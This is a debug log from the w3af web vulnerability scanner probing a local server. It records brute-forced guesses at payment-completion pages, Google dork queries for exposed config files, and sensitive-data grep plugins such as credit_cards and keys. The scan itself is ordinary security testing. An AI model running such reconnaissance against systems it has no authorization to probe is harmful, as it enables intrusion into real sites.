[Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/modules/completepayment.jsp returned HTTP code "404" (id=2312,from_cache=0,grep=1,rtt=0.06,did=OVZB8EYT) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/modules/paymentsuccess.pl returned HTTP code "404" (id=2304,from_cache=0,grep=1,rtt=0.08,did=iZUrOJy7) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/module/return.rb returned HTTP code "404" (id=2306,from_cache=0,grep=1,rtt=0.12,did=7AqnvXdH) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.py returned HTTP code "404" (id=2300,from_cache=0,grep=1,rtt=0.16,did=1dqx0ZaH) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/module/validpay.php3 returned HTTP code "404" (id=2309,from_cache=0,grep=1,rtt=0.19,did=k18gL47H) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/includes/trxcomplete.rb returned HTTP code "404" (id=2305,from_cache=0,grep=1,rtt=0.12,did=t4GbiMLy) [Wed Feb 12 09:40:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/module/valid.py returned HTTP code "404" (id=2310,from_cache=0,grep=1,rtt=0.11,did=DGfAIb1M) [Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/inc/validate.py returned HTTP code "404" (id=2311,from_cache=0,grep=1,rtt=0.05,did=dWsZb3gT) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/servlet/final.asp returned HTTP code "404" (id=2307,from_cache=0,grep=1,rtt=0.16,did=vuGzLa6Q) [Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/libraries/pay.aspx returned HTTP code "404" (id=2302,from_cache=0,grep=1,rtt=0.11,did=CXmxejyB) [Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/includes/finished.aspx returned HTTP code "404" (id=2315,from_cache=0,grep=1,rtt=0.42,did=W6MYwDoa) [Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/includes/complete.jsp returned HTTP code "404" (id=2317,from_cache=0,grep=1,rtt=0.14,did=1kozmCtA) [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/modules/successful.pl returned HTTP code "404" (id=2318,from_cache=0,grep=1,rtt=0.21,did=aytzle8Z) [Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/modules/pay.asp returned HTTP code "404" (id=2303,from_cache=0,grep=1,rtt=0.04,did=rdH8uJsT) [Wed Feb 12 09:40:37 2020 - debug] get_emails.grep(uri="http://localhost:9090/~ftp/") took 2.25s to run [Wed Feb 12 09:40:37 2020 - debug] GET http://localhost:9090/inc/validation.pl returned HTTP code "404" (id=2313,from_cache=0,grep=1,rtt=0.10,did=dXvoWW0l) [Wed Feb 12 09:40:38 2020 - debug] GET http://localhost:9090/inc/complete returned HTTP code "404" (id=2323,from_cache=0,grep=1,rtt=0.05,did=Yrnr79z5) [Wed Feb 12 09:40:39 2020 - debug] GET http://www.google.com/xhtml?q=site:localhost cgiirc.conf&start=0 returned HTTP code "429" (id=2320,from_cache=0,grep=1,rtt=0.30,did=p9ekN5DE) [Wed Feb 12 09:40:39 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:40:39 2020 - debug] POST http://localhost:9090/modules/paymentsuccessful.pl returned HTTP code "404" (id=2316,from_cache=0,grep=1,rtt=0.06,did=SrvU8Rxk) [Wed Feb 12 09:40:39 2020 - debug] POST http://localhost:9090/inc/final.rb returned HTTP code "404" (id=2326,from_cache=0,grep=1,rtt=0.58,did=rVOT594C) [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/includes/paymentcomplete.php returned HTTP code "404" (id=2321,from_cache=0,grep=1,rtt=0.26,did=tGO1B313) [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/servlet/completepay.php3 returned HTTP code "404" (id=2322,from_cache=0,grep=1,rtt=0.07,did=sRvORzjV) [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/servlet/successful.jsp returned HTTP code "404" (id=2327,from_cache=0,grep=1,rtt=0.30,did=ClTWxw7q) [Wed Feb 12 09:40:39 2020 - debug] POST http://localhost:9090/modules/payment.rb returned HTTP code "404" (id=2319,from_cache=0,grep=1,rtt=0.03,did=7E1gcQ64) [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/module/success.py returned HTTP code "404" (id=2325,from_cache=0,grep=1,rtt=0.73,did=8TfL1wGA) [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.jsp returned HTTP code "404" (id=2314,from_cache=0,grep=1,rtt=0.19,did=QRLTzWbH) [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/inc/trxcomplete.pl returned HTTP code "404" (id=2324,from_cache=0,grep=1,rtt=0.29,did=gMJMCbR9) [Wed Feb 12 09:40:39 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.gzip") took 0.71s to run [Wed Feb 12 09:40:39 2020 - debug] Worker with ID GrepWorker(SyXCPA2t) is idle. [Wed Feb 12 09:40:39 2020 - debug] GET http://localhost:9090/module/paid.php3 returned HTTP code "404" (id=2329,from_cache=0,grep=1,rtt=0.42,did=rCQCv986) [Wed Feb 12 09:40:39 2020 - debug] Worker with ID AuditorWorker(gr1tRLjI) has been running job 1446 for 77.45 seconds. The job is: _audit(, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:42 2020 - debug] Worker with ID WorkerThread(qKs3BqVS) has been running job 1445 for 78.85 seconds. The job is: _send_requests(((, , , , , , , , , , , , , , , , kwargs={}) [Wed Feb 12 09:40:44 2020 - debug] Worker with ID CrawlInfraWorker(6gcxf74d) has been running job 532 for 92.47 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:40:44 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1052, 'reject-seen-url': 888, 'reject-out-of-scope': 25, 'accept': 210} [Wed Feb 12 09:40:44 2020 - debug] GET http://localhost:9090/inc/trxcomplete.php3 returned HTTP code "404" (id=2385,from_cache=0,grep=1,rtt=0.21,did=C7VKbOZq) [Wed Feb 12 09:40:44 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1052, 'reject-seen-url': 888, 'reject-out-of-scope': 25, 'accept': 210} [Wed Feb 12 09:40:44 2020 - debug] http_in_body.grep(uri="http://localhost:9090/test/") took 1.24s to run [Wed Feb 12 09:40:44 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/test/") took 1.21s to run [Wed Feb 12 09:40:44 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/test/") took 1.17s to run [Wed Feb 12 09:40:44 2020 - debug] html_comments.grep(uri="http://localhost:9090/test/") took 1.17s to run [Wed Feb 12 09:40:44 2020 - debug] url_session.grep(uri="http://localhost:9090/test/") took 1.17s to run [Wed Feb 12 09:40:44 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/test/") took 1.19s to run [Wed Feb 12 09:40:44 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/test/") took 1.19s to run [Wed Feb 12 09:40:44 2020 - debug] GET http://localhost:9090/servlet/pay returned HTTP code "404" (id=2383,from_cache=0,grep=1,rtt=0.28,did=o49wTS4r) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/includes/finished.pl returned HTTP code "404" (id=2391,from_cache=0,grep=1,rtt=0.44,did=YdAFQSoR) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/modules/completepayment.rb returned HTTP code "404" (id=2378,from_cache=0,grep=1,rtt=0.13,did=oNa1sDt4) [Wed Feb 12 09:40:45 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:8 / max:50 / total:55) [Wed Feb 12 09:40:45 2020 - debug] Connections with more in use time: (5458bbfc0690fc2a, 0.66 sec) (62e87e81607155f6, 0.27 sec) (084f56a9dda1c119, 0.17 sec) (feefb3b1646a9d56, 0.16 sec) (20c6fb7a85d275d0, 0.10 sec) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/includes/validatepay.jsp returned HTTP code "404" (id=2389,from_cache=0,grep=1,rtt=0.37,did=6iVia1iI) [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(SVfxFVXP) has been running job 54 for 126.13 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/infrastructure_plugin.py:52 @ discover_wrapper(), /home/ayush/w3af/w3af/core/controllers/misc/decorators.py:48 @ inner_runonce_meth(), /home/ayush/w3af/w3af/plugins/infrastructure/finger_bing.py:68 @ discover(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:340 @ map(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(br5sQhGq) has been running job 641 for 21.28 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 110.80 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(XyVz5jPE) has been running job 267 for 103.18 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(ubgDPgOi) has been running job 606 for 84.16 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(z6MGDQIP) has been running job 628 for 55.11 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:40:45 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 127 for 125.50 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/dir_file_bruter.py:88 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/dir_file_bruter.py:104 @ _bruteforce_directories(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 09:40:45 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 09:40:45 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:40:45 2020 - debug] CrawlInfraWorker worker pool has 99 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:40:45 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:45 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.rb returned HTTP code "404" (id=2390,from_cache=0,grep=1,rtt=0.27,did=lF94opLY) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/inc/validation.php3 returned HTTP code "404" (id=2394,from_cache=0,grep=1,rtt=0.36,did=buxJ6Dw2) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/servlet/successful.rb returned HTTP code "404" (id=2392,from_cache=0,grep=1,rtt=0.32,did=RKOkpFvZ) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/module/success.jsp returned HTTP code "404" (id=2393,from_cache=0,grep=1,rtt=0.29,did=L8Pqmt8E) [Wed Feb 12 09:40:45 2020 - debug] GET http://localhost:9090/inc/validate.jsp returned HTTP code "404" (id=2387,from_cache=0,grep=1,rtt=0.33,did=T2tqXyCU) [Wed Feb 12 09:40:46 2020 - debug] POST http://localhost:9090/modules/paymentsuccessful.php3 returned HTTP code "404" (id=2388,from_cache=0,grep=1,rtt=0.22,did=gKqzSIoE) [Wed Feb 12 09:40:46 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:40:46 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] password_profiling.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] GET http://localhost:9090/includes/complete.rb returned HTTP code "404" (id=2396,from_cache=0,grep=1,rtt=0.69,did=eS5N7XQ0) [Wed Feb 12 09:40:46 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] GET http://localhost:9090/includes/paymentcomplete.aspx returned HTTP code "404" (id=2384,from_cache=0,grep=1,rtt=0.30,did=2wEZ8VQh) [Wed Feb 12 09:40:46 2020 - debug] GET http://localhost:9090/servlet/validate.php3 returned HTTP code "404" (id=2397,from_cache=0,grep=1,rtt=0.38,did=fcOrZaAu) [Wed Feb 12 09:40:46 2020 - debug] POST http://localhost:9090/modules/pay.jsp returned HTTP code "404" (id=2398,from_cache=0,grep=1,rtt=0.40,did=FjlsyGkX) [Wed Feb 12 09:40:46 2020 - debug] POST http://localhost:9090/libraries/pay.php3 returned HTTP code "404" (id=2399,from_cache=0,grep=1,rtt=0.44,did=ChMLYOez) [Wed Feb 12 09:40:46 2020 - debug] GET http://www.google.com/search?q=site:localhost cgiirc.conf&start=0&sa=N&hl=en returned HTTP code "429" (id=2395,from_cache=0,grep=1,rtt=0.30,did=fnPLPcjM) [Wed Feb 12 09:40:46 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:40:46 2020 - debug] Google search for: 'site:localhost cgiirc.conf' returned 0 unique results [Wed Feb 12 09:40:46 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:2 / max:50 / total:52) [Wed Feb 12 09:40:46 2020 - debug] Connections with more in use time: (62e87e81607155f6, 0.34 sec) (ff37903b27d7f8f9, 0.16 sec) [Wed Feb 12 09:40:46 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.tgz") took 0.31s to run [Wed Feb 12 09:40:46 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.tgz") took 0.00s to run [Wed Feb 12 09:40:46 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.tgz") took 0.09s to run [Wed Feb 12 09:40:46 2020 - debug] POST http://localhost:9090/inc/completepay.php4 returned HTTP code "404" (id=2408,from_cache=0,grep=1,rtt=0.59,did=4XxNzbee) [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/includes/validatepay.rb returned HTTP code "404" (id=2401,from_cache=0,grep=1,rtt=0.17,did=oGbYZw4r) [Wed Feb 12 09:40:47 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 148. [Wed Feb 12 09:40:47 2020 - debug] GET http://localhost:9090/module/finished returned HTTP code "404" (id=2412,from_cache=0,grep=1,rtt=0.13,did=M0UNW475) [Wed Feb 12 09:40:47 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.tgz") took 0.84s to run [Wed Feb 12 09:40:47 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.tgz") took 0.86s to run [Wed Feb 12 09:40:47 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.tgz") took 0.86s to run [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/includes/finished.php3 returned HTTP code "404" (id=2409,from_cache=0,grep=1,rtt=0.18,did=ZkLvrFpW) [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful returned HTTP code "404" (id=2414,from_cache=0,grep=1,rtt=0.26,did=VoPBScAX) [Wed Feb 12 09:40:47 2020 - debug] GET http://localhost:9090/includes/validation.php3 returned HTTP code "404" (id=2415,from_cache=0,grep=1,rtt=0.20,did=r0aqMSqV) [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/modules/completepayment.php4 returned HTTP code "404" (id=2413,from_cache=0,grep=1,rtt=0.25,did=fEsIQWpe) [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/libraries/validatepayment returned HTTP code "404" (id=2416,from_cache=0,grep=1,rtt=0.06,did=WdtKtDjz) [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/servlet/successful.php4 returned HTTP code "404" (id=2417,from_cache=0,grep=1,rtt=0.12,did=Wr8YKbGx) [Wed Feb 12 09:40:47 2020 - debug] POST http://localhost:9090/includes/paymentcomplete.pl returned HTTP code "404" (id=2419,from_cache=0,grep=1,rtt=0.06,did=Oa9k5lh2) [Wed Feb 12 09:40:47 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.tgz") took 0.87s to run [Wed Feb 12 09:40:47 2020 - debug] GET http://localhost:9090/inc/final.php4 returned HTTP code "404" (id=2421,from_cache=0,grep=1,rtt=0.26,did=xq8PV4AS) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.php4 returned HTTP code "404" (id=2423,from_cache=0,grep=1,rtt=0.21,did=zR3FwOgB) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/includes/complete.php4 returned HTTP code "404" (id=2424,from_cache=0,grep=1,rtt=0.08,did=D4HYpPyd) [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/modules/payment.php4 returned HTTP code "404" (id=2411,from_cache=0,grep=1,rtt=0.11,did=PM4df5lM) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/servlet/pay.cgi returned HTTP code "404" (id=2410,from_cache=0,grep=1,rtt=0.04,did=5ulT8Rln) [Wed Feb 12 09:40:48 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.tgz") took 0.92s to run [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/modules/paymentsuccess.php3 returned HTTP code "404" (id=2425,from_cache=0,grep=1,rtt=0.06,did=9qXwklSn) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/servlet/payment returned HTTP code "404" (id=2418,from_cache=0,grep=1,rtt=0.09,did=LMeZRC2i) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/inc/validate.rb returned HTTP code "404" (id=2420,from_cache=0,grep=1,rtt=0.29,did=O4Li0tl0) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/inc/complete.asp returned HTTP code "404" (id=2400,from_cache=0,grep=1,rtt=0.37,did=zwKXc3WV) [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/module/valid.jsp returned HTTP code "404" (id=2426,from_cache=0,grep=1,rtt=0.08,did=48PKO8aZ) [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/module/paymentsuccessful.pl returned HTTP code "404" (id=2427,from_cache=0,grep=1,rtt=0.03,did=fjneZM1N) [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/includes/trxcomplete.php4 returned HTTP code "404" (id=2428,from_cache=0,grep=1,rtt=0.08,did=a9leknj4) [Wed Feb 12 09:40:48 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.tgz") took 0.97s to run [Wed Feb 12 09:40:48 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.tgz") took 1.08s to run [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/servlet/final.py returned HTTP code "404" (id=2429,from_cache=0,grep=1,rtt=0.09,did=jaNbqWc2) [Wed Feb 12 09:40:48 2020 - debug] POST http://localhost:9090/module/success.rb returned HTTP code "404" (id=2422,from_cache=0,grep=1,rtt=0.38,did=Zp3MajCv) [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/includes/completepay returned HTTP code "404" (id=2430,from_cache=0,grep=1,rtt=0.08,did=iUkGGH1B) [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/modules/pay.jsp returned HTTP code "404" (id=2431,from_cache=0,grep=1,rtt=0.09,did=dWOFCu2F) [Wed Feb 12 09:40:48 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:40:48 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1077, 'reject-seen-url': 911, 'reject-out-of-scope': 26, 'accept': 211} [Wed Feb 12 09:40:48 2020 - debug] GET http://localhost:9090/modules/paymentsuccessful.php3 returned HTTP code "404" (id=2432,from_cache=0,grep=1,rtt=0.23,did=1VS6fHRy) [Wed Feb 12 09:40:48 2020 - debug] get_emails.grep(uri="http://localhost:9090/test/") took 2.78s to run [Wed Feb 12 09:40:49 2020 - debug] POST http://localhost:9090/module/finished.cgi returned HTTP code "404" (id=2433,from_cache=0,grep=1,rtt=0.10,did=Lw1suSbH) [Wed Feb 12 09:40:49 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:40:49 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] localhost:9090 connection pool stats (free:45 / in_use:7 / max:50 / total:52) [Wed Feb 12 09:40:49 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.18 sec) (084f56a9dda1c119, 0.16 sec) (20c6fb7a85d275d0, 0.13 sec) (ff37903b27d7f8f9, 0.10 sec) (d49dc8e833c97ce2, 0.09 sec) [Wed Feb 12 09:40:49 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] 